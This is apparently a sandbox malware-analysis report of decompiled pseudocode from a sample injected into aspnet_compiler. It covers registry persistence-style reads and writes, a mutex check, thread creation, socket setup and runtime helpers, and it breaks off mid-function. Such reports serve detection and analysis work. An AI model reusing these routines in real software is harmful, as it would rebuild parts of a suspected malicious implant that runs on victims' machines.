                control_flow_graph 1200 412b5f-412b75 RegCreateKeyA 1201 412ba1 1200->1201 1202 412b77-412b9f RegSetValueExA RegCloseKey 1200->1202 1203 412ba3-412ba6 1201->1203 1202->1203
                C-Code - Quality: 100%
                			E00412B5F(void* __ecx, char* __edx, char* _a4, char _a8) {
				void* _v8;
				long _t9;
				long _t12;

				_t1 =  &_v8; // 0x464074
				_t9 = RegCreateKeyA(0x80000001, __edx, _t1); // executed
				if(_t9 != 0) {
					return 0;
				}
				_t4 =  &_v8; // 0x464074, executed
				_t12 = RegSetValueExA( *_t4, _a4, 0, 4,  &_a8, 4); // executed
				return RegCloseKey(_v8) & 0xffffff00 | _t12 == 0x00000000;
			}






                0x00412b63
                0x00412b6d
                0x00412b75
                0x00000000
                0x00412ba1
                0x00412b85
                0x00412b88
                0x00000000

                APIs
                • RegCreateKeyA.ADVAPI32(80000001,00000000,t@F), ref: 00412B6D
                • RegSetValueExA.KERNELBASE(t@F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B6CC,00464C08,00000001,000000AF,00464074), ref: 00412B88
                • RegCloseKey.ADVAPI32(?,?,?,?,0040B6CC,00464C08,00000001,000000AF,00464074), ref: 00412B93
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateValue
                • String ID: t@F
                • API String ID: 1818849710-3279925822
                • Opcode ID: 61de9578f52ee8f0e092330830a64b9a8e5eb202a0654fe1bc12343b251ebfa2
                • Instruction ID: f68fcc0987728696b45baa029fbd8ba208f586d8d4f13f853052a764fd9765f2
                • Opcode Fuzzy Hash: 61de9578f52ee8f0e092330830a64b9a8e5eb202a0654fe1bc12343b251ebfa2
                • Instruction Fuzzy Hash: 13E06D72544308FFDF109FA0ED05FEA7BACEB04BA1F1040A5BF09E6191D2759E14A7A8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040949A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 90%
                			E0040949A(void* __ebx, void* __edi, void* __eflags, char _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
				char _v28;
				char _v52;
				char _v76;
				void* __esi;
				void* __ebp;
				void* _t24;
				void* _t25;
				void* _t36;
				void* _t72;
				void* _t75;
				void* _t76;
				void* _t77;

				_t47 = __ebx;
				_t77 = _t76 - 0x4c;
				 *0x46f9d4 = _a4;
				_push(_t72);
				E00401F66(__ebx,  &_v28);
				_t24 = E0043A3D6(_a12);
				_t69 = _a8;
				if(_t24 != 0) {
					_t25 = E0040CF38( &_v52, _t69, _a12); // executed
					E00401EF3(0x4730b8, _t69, 0x4730b8, _t25);
					E00401EE9();
					_t69 = E004087F0( &_v76, 0x4730b8, _t75, "\\");
					E00401EF3( &_v28, _t28, 0x4730b8, E00402FF4(__ebx,  &_v52, _t28, __edi, _t75, __eflags, _a16));
					E00401EE9();
				} else {
					E00401EF3( &_v28, _t69, _t72, E0040CF38( &_v52, _t69, _a16));
				}
				E00401EE9();
				 *0x4730ec =  *0x4730ec & 0x00000000;
				 *0x4730e8 = _a20 * 0x3e8;
				 *0x47308b = _a24;
				_t36 =  *0x46f9d4 - 0x31;
				if(_t36 == 0) {
					E004086D0(_t47, _t77 - 0x18, _t69, __eflags,  &_v28);
					E0040977E(0x473040, _t69);
				} else {
					_t83 = _t36 == 1;
					if(_t36 == 1) {
						E004086D0(_t47, _t77 - 0x18, _t69, _t83,  &_v28);
						E00409835(0x473040);
					}
				}
				return E00401EE9();
			}















                0x0040949a
                0x004094a3
                0x004094a6
                0x004094ab
                0x004094ac
                0x004094b4
                0x004094b9
                0x004094c2
                0x004094de
                0x004094ec
                0x004094f4
                0x0040950c
                0x0040951b
                0x00409523
                0x004094c4
                0x004094d1
                0x004094d6
                0x0040952b
                0x00409537
                0x0040953e
                0x00409546
                0x00409552
                0x00409555
                0x0040957f
                0x00409589
                0x00409557
                0x00409557
                0x0040955a
                0x00409565
                0x0040956f
                0x0040956f
                0x0040955a
                0x0040959a

                APIs
                • _wcslen.LIBCMT ref: 004094B4
                  • Part of subcall function 0040977E: CreateThread.KERNEL32 ref: 00409806
                  • Part of subcall function 0040977E: CreateThread.KERNEL32 ref: 00409816
                  • Part of subcall function 0040977E: CreateThread.KERNEL32 ref: 00409822
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread$_wcslen
                • String ID: @0G$@0G
                • API String ID: 1119755333-1610251930
                • Opcode ID: 268728ee2d6dba40f4f33c5f53b121d98ffa03439a0f2b2e373874df87bffea9
                • Instruction ID: 8240ad2e3e1aaba782ca1c27cc07c235db1714dcc0b5eaf1d0f18af9b8f17ace
                • Opcode Fuzzy Hash: 268728ee2d6dba40f4f33c5f53b121d98ffa03439a0f2b2e373874df87bffea9
                • Instruction Fuzzy Hash: 81216171914149AACB05FFA6EC528EE7B78AE11304F00403FF805721E7DE385A59D7DA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040C577 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1245 40c577-40c5a3 call 401f8b CreateMutexA GetLastError
                C-Code - Quality: 100%
                			E0040C577() {
				void* _t4;

				_t4 = CreateMutexA(0, 1, E00401F8B(0x473268)); // executed
				 *0x470d44 = _t4;
				return 0 | GetLastError() != 0x000000b7;
			}




                0x0040c586
                0x0040c58c
                0x0040c5a3

                APIs
                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040E146,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046408C,00000003,00000000), ref: 0040C586
                • GetLastError.KERNEL32 ref: 0040C591
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateErrorLastMutex
                • String ID: h2G
                • API String ID: 1925916568-3159213000
                • Opcode ID: 4bc70ddb443fc9c159d84246c0f6c07cfd46d333705cf816a3e212b6fca9faca
                • Instruction ID: e6373a13d656ff6d6707b7a2cb114a9c32d4b8c21df5bc8e6e0dabda27f4a646
                • Opcode Fuzzy Hash: 4bc70ddb443fc9c159d84246c0f6c07cfd46d333705cf816a3e212b6fca9faca
                • Instruction Fuzzy Hash: 1CD01270709301DBD7141B74AC5976C35609B44703F0044B9F50BD55D1DB788480951A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041288E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1248 41288e-4128ba RegOpenKeyExA 1249 4128bc-4128e4 RegQueryValueExA RegCloseKey 1248->1249 1250 4128ef 1248->1250 1251 4128f1 1249->1251 1252 4128e6-4128ed 1249->1252 1250->1251 1253 4128f6-412902 call 402073 1251->1253 1252->1253
                C-Code - Quality: 84%
                			E0041288E(void* __ecx, void* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				char _v1036;
				void* __ebp;
				long _t11;
				long _t16;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t26;

				_t22 = __edx;
				_v12 = 0x400;
				_t23 = __ecx;
				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
				if(_t11 != 0) {
					_t21 = _t23;
					goto L4;
				} else {
					_t16 = RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed
					RegCloseKey(_v8); // executed
					_t21 = _t23;
					if(_t16 != 0) {
						L4:
						_push(0x464074);
					} else {
						_push( &_v1036);
					}
				}
				E00402073(_t19, _t21, _t22, _t26);
				return _t23;
			}













                0x0041288e
                0x0041289c
                0x004128ab
                0x004128b2
                0x004128ba
                0x004128ef
                0x00000000
                0x004128bc
                0x004128cf
                0x004128da
                0x004128e0
                0x004128e4
                0x004128f1
                0x004128f1
                0x004128e6
                0x004128ec
                0x004128ec
                0x004128e4
                0x004128f6
                0x00412902

                APIs
                • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004128B2
                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004128CF
                • RegCloseKey.KERNELBASE(?), ref: 004128DA
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID:
                • API String ID: 3677997916-0
                • Opcode ID: 828b1612e10127a61cfb506c01d251519174206b74f7c168bb24ef52ea09b40d
                • Instruction ID: fa08edaff8def4b33d2b8c01463c49d1e7a9fcd5e8e464c1f7b2d0f15f6578c3
                • Opcode Fuzzy Hash: 828b1612e10127a61cfb506c01d251519174206b74f7c168bb24ef52ea09b40d
                • Instruction Fuzzy Hash: 0701DB76A00228BBDB205B95DD08DDF7FBDEB44751F004166BF04E2140D6748E55D7A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00412831 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1256 412831-412859 RegOpenKeyExA 1257 412888 1256->1257 1258 41285b-412886 RegQueryValueExA RegCloseKey 1256->1258 1259 41288a-41288d 1257->1259 1258->1259
                C-Code - Quality: 100%
                			E00412831(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;
				signed int _t19;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
				_t19 = RegCloseKey(_v8); // executed
				return _t19 & 0xffffff00 | _t18 == 0x00000000;
			}










                0x00412839
                0x0041283a
                0x0041283d
                0x00412851
                0x00412859
                0x00000000
                0x00412888
                0x0041286f
                0x0041287a
                0x00000000

                APIs
                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00412851
                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00473238), ref: 0041286F
                • RegCloseKey.KERNELBASE(?), ref: 0041287A
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID:
                • API String ID: 3677997916-0
                • Opcode ID: 512b3eed686be6b2a2b717d5ef0a3d80ed66878d695c99a4db23412f4a9e56d0
                • Instruction ID: 69e43ff86f888a52894dd2156315322568ee34e4473ddb17d5254d30eae93871
                • Opcode Fuzzy Hash: 512b3eed686be6b2a2b717d5ef0a3d80ed66878d695c99a4db23412f4a9e56d0
                • Instruction Fuzzy Hash: 38F06D7294020CBFDF109FA0AD05FEEBBBCEB04B11F1041A1FA04E6191D2748A549B94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044DC5D Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0044DC5D(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0044DBA3(_t19) - _t19 >> 1) + (E0044DBA3(_t19) - _t19 >> 1);
					_t6 = E00444A38(_t14, (E0044DBA3(_t19) - _t19 >> 1) + (E0044DBA3(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E004351E0(_t18, _t19, _t12);
					}
					E00445002(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                0x0044dc5d
                0x0044dc67
                0x0044dc6b
                0x0044dc7c
                0x0044dc80
                0x0044dc85
                0x0044dc8b
                0x0044dc90
                0x0044dc95
                0x0044dc9a
                0x0044dca1
                0x0044dc6d
                0x0044dc6d
                0x0044dc6d
                0x0044dcac

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 0044DC61
                • _free.LIBCMT ref: 0044DC9A
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044DCA1
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: EnvironmentStrings$Free_free
                • String ID:
                • API String ID: 2716640707-0
                • Opcode ID: e849e70284f1b11de74d388bff7e1643b43188b58a6ab48f4f5b44a644565459
                • Instruction ID: ad86e6e1ddca97a4082ae09d5a587ea03e6d4441ea4a4b9225e9d0609d6c243f
                • Opcode Fuzzy Hash: e849e70284f1b11de74d388bff7e1643b43188b58a6ab48f4f5b44a644565459
                • Instruction Fuzzy Hash: 33E09B77945E112BB622372ABC85E6F3658CFC27B6716012BF40496342EE589D0281FD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004127E7 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004127E7(void* __ecx, char* __edx, char* _a4) {
				void* _v8;
				long _t8;
				signed int _t9;
				long _t10;
				signed int _t11;

				_t8 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t8 != 0) {
					_t9 = 0;
				} else {
					_t10 = RegQueryValueExA(_v8, _a4, 0, 0, 0, 0); // executed
					_t11 = RegCloseKey(_v8); // executed
					_t9 = _t11 & 0xffffff00 | _t10 == 0x00000000;
				}
				return _t9;
			}








                0x004127fe
                0x00412806
                0x0041282a
                0x00412808
                0x00412812
                0x0041281d
                0x00412825
                0x00412825
                0x00412830

                APIs
                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B716,00464C08), ref: 004127FE
                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B716,00464C08), ref: 00412812
                • RegCloseKey.KERNELBASE(?,?,?,0040B716,00464C08), ref: 0041281D
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID:
                • API String ID: 3677997916-0
                • Opcode ID: e324eca442c7ad9a6d0e8b8ac30f941762bccad947d2c0f2533ecc126fcf5853
                • Instruction ID: 84763f97e707706bd7246b5a08c576b286280a2d5f648d27a36c848fc85b91b7
                • Opcode Fuzzy Hash: e324eca442c7ad9a6d0e8b8ac30f941762bccad947d2c0f2533ecc126fcf5853
                • Instruction Fuzzy Hash: 9CE06531905338BB9B205BA2AD0DDEB7FACDF06BA1B010165BD09A1151D2658E50E6E4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00444A38 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 94%
                			E00444A38(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0043EEAD())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x470a5c, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00443E46();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00441850(_t7, _t8, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}








                0x00444a38
                0x00444a3e
                0x00444a44
                0x00444a76
                0x00444a7b
                0x00444a81
                0x00000000
                0x00444a81
                0x00444a48
                0x00444a4a
                0x00444a4a
                0x00444a61
                0x00444a6a
                0x00444a72
                0x00000000
                0x00000000
                0x00444a52
                0x00444a54
                0x00000000
                0x00000000
                0x00444a57
                0x00444a5c
                0x00444a5d
                0x00444a5f
                0x00000000
                0x00000000
                0x00444a5f
                0x00000000

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID: P@
                • API String ID: 1279760036-676759640
                • Opcode ID: 9797f3068208b50acbf799f5f92ac938ca8f5a32afd615d80b0c57cacc916379
                • Instruction ID: fd7924e8b65afa23adb338f609f8de03ed02b176ca6f4a568383a370c07dd500
                • Opcode Fuzzy Hash: 9797f3068208b50acbf799f5f92ac938ca8f5a32afd615d80b0c57cacc916379
                • Instruction Fuzzy Hash: 69E0ED31581220AAF7307A669C05B6B3A8C9BD17B1F195027AC19B2AD4CB28CD0082ED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00444A86 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 96%
                			E00444A86(void* __ecx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t13;
				long _t15;

				_t10 = __ecx;
				_t13 = _a4;
				if(_t13 != 0) {
					_t15 = _a8;
					__eflags = _t15;
					if(_t15 != 0) {
						__eflags = _t15 - 0xffffffe0;
						if(_t15 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0x470a5c, 0, _t13, _t15); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00443E46();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00441850(_t10, _t15, __eflags, _t15);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E0043EEAD())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00445002(_t13);
					goto L6;
				}
				return E00444A38(__ecx, _a8);
			}








                0x00444a86
                0x00444a8c
                0x00444a91
                0x00444a9f
                0x00444aa2
                0x00444aa4
                0x00444aaf
                0x00444ab2
                0x00444ad9
                0x00444ae3
                0x00444ae9
                0x00444aeb
                0x00000000
                0x00000000
                0x00444aca
                0x00444acc
                0x00000000
                0x00000000
                0x00444acf
                0x00444ad4
                0x00444ad5
                0x00444ad7
                0x00000000
                0x00000000
                0x00444ad7
                0x00444ac1
                0x00000000
                0x00444ac1
                0x00444ab4
                0x00444ab9
                0x00444abf
                0x00444abf
                0x00444abf
                0x00000000
                0x00444abf
                0x00444aa7
                0x00000000
                0x00444aac
                0x00000000

                APIs
                • _free.LIBCMT ref: 00444AA7
                  • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,0043180D,00000000,0000000F,0042E217,?,?,004302BE,?,?,00000000), ref: 00444AE3
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap$_free
                • String ID:
                • API String ID: 1482568997-0
                • Opcode ID: 4b96d1d03d127e41e3fc58a79c3927ff31fe86e0064b2259c09856af757f84b3
                • Instruction ID: 455c427813147b6f3d2efebb8123bf363e795c38cc092496033f2fe0a3bdb231
                • Opcode Fuzzy Hash: 4b96d1d03d127e41e3fc58a79c3927ff31fe86e0064b2259c09856af757f84b3
                • Instruction Fuzzy Hash: 76F0F632281215AAFB216A66AC01F6B379D9FC1B74F24412FF914B62D1DF2CCC0041AD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040480D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E0040480D(char* __ecx) {
				intOrPtr _t14;
				char _t16;
				char* _t22;

				_t22 = __ecx;
				if( *0x470abb != 0 || E0040487E() != 0) {
					_t14 =  *0x470adc; // 0x140f348
					__imp__#23( *((intOrPtr*)(_t14 + 4)), 1, 6); // executed
					 *((intOrPtr*)(_t22 + 4)) = _t14;
					if(_t14 == 0xffffffff) {
						goto L2;
					} else {
						_t16 =  *0x470ae4; // 0x1
						 *((char*)(_t22 + 0x5c)) = 0;
						 *((intOrPtr*)(_t22 + 0x60)) = 0;
						 *((intOrPtr*)(_t22 + 0x58)) = 0x3e8;
						 *((char*)(_t22 + 0x7d)) = 0;
						 *((char*)(_t22 + 1)) = _t16;
						 *((intOrPtr*)(_t22 + 0x4c)) = 0;
						 *((intOrPtr*)(_t22 + 0x50)) = 0;
						 *((intOrPtr*)(_t22 + 0x68)) = 0;
						 *((intOrPtr*)(_t22 + 0x70)) = 0;
						 *((intOrPtr*)(_t22 + 0x6c)) = 0;
						 *((intOrPtr*)(_t22 + 0x68)) = CreateEventW(0, 0, 1, 0);
						 *_t22 = 1;
						return 1;
					}
				} else {
					L2:
					return 0;
				}
			}






                0x00404815
                0x00404817
                0x00404826
                0x00404832
                0x00404838
                0x0040483e
                0x00000000
                0x00404840
                0x00404840
                0x0040484c
                0x0040484f
                0x00404852
                0x00404859
                0x0040485c
                0x0040485f
                0x00404862
                0x00404865
                0x00404868
                0x0040486b
                0x00404874
                0x00404879
                0x0040487d
                0x0040487d
                0x00404822
                0x00404822
                0x00404825
                0x00404825

                APIs
                • socket.WS2_32(?,00000001,00000006), ref: 00404832
                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052EB,?,?,00000000,00000000,?,?,00000000,004051E8,?,00000000), ref: 0040486E
                  • Part of subcall function 0040487E: WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateEventStartupsocket
                • String ID:
                • API String ID: 1953588214-0
                • Opcode ID: ffe2297606e416d6c3b5ccad3e5f88dc31d939aa0b0f85ed0b7fe91bade190d6
                • Instruction ID: 59a91cd762d8530cb4f753689cd2647fba7b16dd7f4d7e7b9f20fabe365cb730
                • Opcode Fuzzy Hash: ffe2297606e416d6c3b5ccad3e5f88dc31d939aa0b0f85ed0b7fe91bade190d6
                • Instruction Fuzzy Hash: 200171B14087809FD7359F39B845697BFE0AB15304F048D6EF1DA97B91D3B1A481CB58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044205C Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E0044205C(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t15;
				signed int _t16;

				if( *0x4704e0 == 0) {
					_push(_t15);
					E0044D8D9(__ecx); // executed
					_t2 = E0044DBDA(); // executed
					_t19 = _t2;
					if(_t2 != 0) {
						_t3 = E00442109(__ebx, _t19);
						if(_t3 != 0) {
							 *0x4704ec = _t3;
							E00442471(0x4704e0, _t3);
							_t16 = 0;
						} else {
							_t16 = _t15 | 0xffffffff;
						}
						E00445002(0);
					} else {
						_t16 = _t15 | 0xffffffff;
					}
					E00445002(_t19);
					return _t16;
				} else {
					return 0;
				}
			}







                0x00442063
                0x00442069
                0x0044206a
                0x0044206f
                0x00442074
                0x00442078
                0x00442080
                0x00442088
                0x00442095
                0x0044209a
                0x0044209f
                0x0044208a
                0x0044208a
                0x0044208a
                0x004420a3
                0x0044207a
                0x0044207a
                0x0044207a
                0x004420aa
                0x004420b4
                0x00442065
                0x00442067
                0x00442067

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: 28729854537139cf2ef588ebbf1e600906cd533a01d3acd7e3f75a6007daa64c
                • Instruction ID: b81e25f7d5918c7bd40ad8093da2d01db50d861b45bde7110f025ab76158fc47
                • Opcode Fuzzy Hash: 28729854537139cf2ef588ebbf1e600906cd533a01d3acd7e3f75a6007daa64c
                • Instruction Fuzzy Hash: F7E0A02660282155B631723BBE0AA6F01858BC173DF91422BFA24861C2DFAC4882819D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E0040163E(signed int _a4, signed int _a8, char _a12) {
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* __esi;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				signed int _t76;
				signed int _t87;
				signed int _t90;
				signed int _t91;
				signed int _t92;
				intOrPtr _t93;
				signed int _t94;
				signed int _t96;
				intOrPtr _t97;
				intOrPtr _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed int _t123;
				intOrPtr* _t125;
				signed int _t130;
				signed int _t132;
				signed int _t133;
				void* _t134;
				void* _t140;
				void* _t141;
				void* _t144;
				void* _t145;

				_t108 = _a4;
				if(_t108 != 0) {
					_t65 = _t64 | 0xffffffff;
					_t123 = _t65 % _a8;
					__eflags = _t65 / _a8 - _t108;
					if(_t65 / _a8 >= _t108) {
						_t109 = _t108 * _a8;
						__eflags = _a12;
						if(__eflags == 0) {
							L8:
							_t67 = E00432DF5(_t123, _t134, __eflags, _t109); // executed
							_t111 = _t67;
							goto L9;
						} else {
							__eflags = _t109 - 0x1000;
							if(__eflags < 0) {
								goto L8;
							} else {
								_t69 = _t109 + 0x23;
								__eflags = _t109 + 0x23 - _t109;
								if(__eflags <= 0) {
									goto L3;
								} else {
									_t97 = E00432DF5(_t123, _t134, __eflags, _t69);
									_t11 = _t97 + 0x23; // 0x23
									_t111 = _t11 & 0xffffffe0;
									 *((intOrPtr*)(_t111 - 4)) = _t97;
									L9:
									return _t111;
								}
							}
						}
					} else {
						L3:
						_t140 = _t144;
						_t145 = _t144 - 0xc;
						E004334C8( &_v16);
						E004379F6( &_v16,  &E0046C37C);
						asm("int3");
						_push(_t140);
						_t141 = _t145;
						E004334FB( &_v32);
						E004379F6( &_v32,  &E0046C3B4);
						asm("int3");
						_push(_t141);
						 *0x46fd1c =  *0x46fd1c & 0x00000000;
						 *0x46f010 =  *0x46f010 | 1;
						_t76 = IsProcessorFeaturePresent(0xa);
						__eflags = _t76;
						if(_t76 != 0) {
							_v32 = _v32 & 0x00000000;
							 *0x46f010 =  *0x46f010 | 0x00000002;
							_push(_t134);
							 *0x46fd1c = 1;
							_t125 =  &_v56;
							_push(1);
							asm("cpuid");
							_pop(_t103);
							 *_t125 = 0;
							 *((intOrPtr*)(_t125 + 4)) = 1;
							 *((intOrPtr*)(_t125 + 8)) = 0;
							 *(_t125 + 0xc) = _t123;
							_v24 = _v56;
							_v16 = _v44 ^ 0x49656e69;
							_v20 = _v48 ^ 0x6c65746e;
							_push(1);
							asm("cpuid");
							_t105 =  &_v56;
							__eflags = _v52 ^ 0x756e6547 | _v16 | _v20;
							 *_t105 = 1;
							 *((intOrPtr*)(_t105 + 4)) = _t103;
							 *((intOrPtr*)(_t105 + 8)) = 0;
							 *(_t105 + 0xc) = _t123;
							if((_v52 ^ 0x756e6547 | _v16 | _v20) != 0) {
								L21:
								_t130 =  *0x46fd20; // 0x2
							} else {
								_t96 = _v56 & 0x0fff3ff0;
								__eflags = _t96 - 0x106c0;
								if(_t96 == 0x106c0) {
									L20:
									_t133 =  *0x46fd20; // 0x2
									_t130 = _t133 | 0x00000001;
									 *0x46fd20 = _t130;
								} else {
